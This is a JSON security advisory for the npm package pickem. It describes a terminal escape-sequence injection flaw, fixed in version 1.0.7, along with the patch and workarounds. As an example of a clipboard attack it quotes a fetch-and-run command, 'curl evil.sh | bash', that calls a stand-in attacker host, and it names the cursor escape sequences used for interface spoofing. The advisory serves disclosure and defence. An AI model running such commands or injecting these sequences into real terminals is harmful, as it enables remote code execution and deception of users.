{"id":"GHSA-8qx3-8gm5-9cj2","summary":"pickem vulnerable to terminal escape-sequence injection via unsanitized item text","details":"### Impact\npickem rendered item text (label, description, group, meta, name) to the terminal with no control-character sanitization. `chrome.row` only stripped ANSI from the **active** row; inactive rows, the public `createFormatter`, and selection-summary lines printed labels **raw**, and the ANSI strip missed bare C0 controls anyway.\n\nBecause item text is frequently attacker-controllable (git branch names, PR/issue titles, filenames, npm/API results), a malicious label was a terminal write primitive:\n\n- **OSC 52 clipboard write** — silently load e.g. `curl evil.sh | bash` into the user's clipboard; their next paste-into-shell is RCE.\n- **Cursor-movement + erase** (`ESC[1A`, `ESC[2K`) — overwrite already-printed trusted lines to spoof UI (forge a \"✓ Verified publisher\", fake prompt, or hide a malicious entry).\n- **BEL / C0 control flooding.**\n\nAny CLI that passes untrusted strings into pickem choices is affected.\n\n### Patches\nFixed in **1.0.7**. A new `sanitizeDisplay()` strips every escape sequence except inert SGR (color), plus all C0/C1/DEL control bytes, at the render boundary — applied to every externally-supplied display string across all prompts (`select`, `search`, `checkbox`, `searchable-checkbox`, `input`), `createFormatter`, row meta, and committed selection summaries. Display-only; returned values are unchanged.\n\n### Workarounds\nUpgrade to \u003e= 1.0.7. Otherwise, strip C0/C1/DEL control characters and ANSI escape sequences from any untrusted text before passing it to pickem.","modified":"2026-08-26T00:42:27.676365494Z","published":"2026-08-25T15:59:11Z","database_specific":{"nvd_published_at":null,"cwe_ids":["CWE-150"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-08-25T15:59:11Z"},"references":[{"type":"WEB","url":"https://github.com/calebogden/pickem-oss/security/advisories/GHSA-8qx3-8gm5-9cj2"},{"type":"PACKAGE","url":"https://github.com/calebogden/pickem-oss"},{"type":"WEB","url":"https://github.com/calebogden/pickem-oss/releases/tag/v1.0.7"}],"affected":[{"package":{"name":"pickem","ecosystem":"npm","purl":"pkg:npm/pickem"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.0.7"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/08/GHSA-8qx3-8gm5-9cj2/GHSA-8qx3-8gm5-9cj2.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"}]}